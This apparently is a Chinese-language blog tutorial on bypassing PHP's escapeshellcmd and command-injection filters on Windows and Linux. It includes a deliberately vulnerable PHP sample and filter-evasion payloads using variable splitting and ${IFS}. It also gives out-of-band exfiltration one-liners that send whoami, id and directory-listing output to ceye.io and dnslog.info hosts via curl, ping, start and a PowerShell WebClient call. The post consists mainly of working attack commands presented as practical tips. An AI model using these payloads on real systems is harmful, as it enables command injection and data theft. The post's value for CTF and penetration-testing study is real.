先看一個例子:
本地測試環境:php 5.4.45 + win
<?php
$command = 'dir '.$_POST['dir'];
$escaped_command = escapeshellcmd($command);
var_dump($escaped_command);
file_put_contents('out.bat',$escaped_command);
system('out.bat');
?>
應該如何去繞過執行?
escapeshellcmd
http://php.net/manual/zh/function.escapeshellcmd.php
escapeshellcmd() 對字符串中可能會欺騙 shell 命令執行任意命令的字符進行轉義。 此函數保證用戶輸入的數據在傳送到 exec() 或 system() 函數,或者 執行操作符 之前進行轉義。
具體會轉義哪些字符?
https://github.com/php/php-src/blob/PHP-5.4.45/ext/standard/exec.c
這些都會用^來取消其意義。也就是沒辦法用& | 來執行其他命令,只能列目錄。
有這樣的一個tip:執行.bat文件的時候,利用%1a,可以繞過過濾執行命令。
更多好玩的命令繞過
linux下面tip特別多,在實戰或者ctf中遇到最多的幾個。
1、黑名單繞過
執行ls命令:
a=l;b=s;$a$b
cat hello文件內容:
a=c;b=at;c=he;d=llo;$a$b ${c}${d}
2、空格繞過
繞過空格
${IFS}
或者在讀取文件的時候利用重定向符
<>
最后就是別人fuzz的一個命令執行項目:
https://github.com/ewilded/shelling
3、無回顯
無回顯獲取數據的需求還是挺大的,比如sql,xxe,xss等等,這個時候一般可以用dns/http通道來獲取數據。
linux:
curl xxxx.ceye.io/`whoami`
ping -c 1 `whoami`.xxxx.ceye.io
可以獲取數據,當前權限是root
但是有一個特別惱火的事情就是特殊字符或者是空格出現的話,這時候可以通過一些編碼來,比如base64
curl http://xxxx.ceye.io/$(id|base64)
windows:
windows下很頭疼,用起來並沒有linux那么方便好用,比如curl、wget等等。
http請求:
for /F %x in ('whoami') do start http://xxx.ceye.io/%x
dns請求:
獲取計算機名:for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info
獲取用戶名:for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info
powershell這么厲害,為啥不用它來base64一下數據。
for /F %x in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%x'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://xxx.ceye.io/'+$a);
這樣就也能獲取到一個base64編碼到命令結果啦~算是彌補一個小小的坑。
ps:這個是用powershell2.0寫的,其他版本未測試。
但是如果沒有powershell想要獲取更多數據的話,還是比較麻煩的。
比如獲取d:\所有文件,遇上空格也是會被截斷。
for /F %x in ('dir /b D:\') do start http://xxx.ceye.io/%x
4、借他人之手來獲取字符
如果過濾了<>?,可以從已有的文件中獲取自己需要的字符。
=。=,當然如果服務器能外網的話,直接wget -o /tmp 就好了。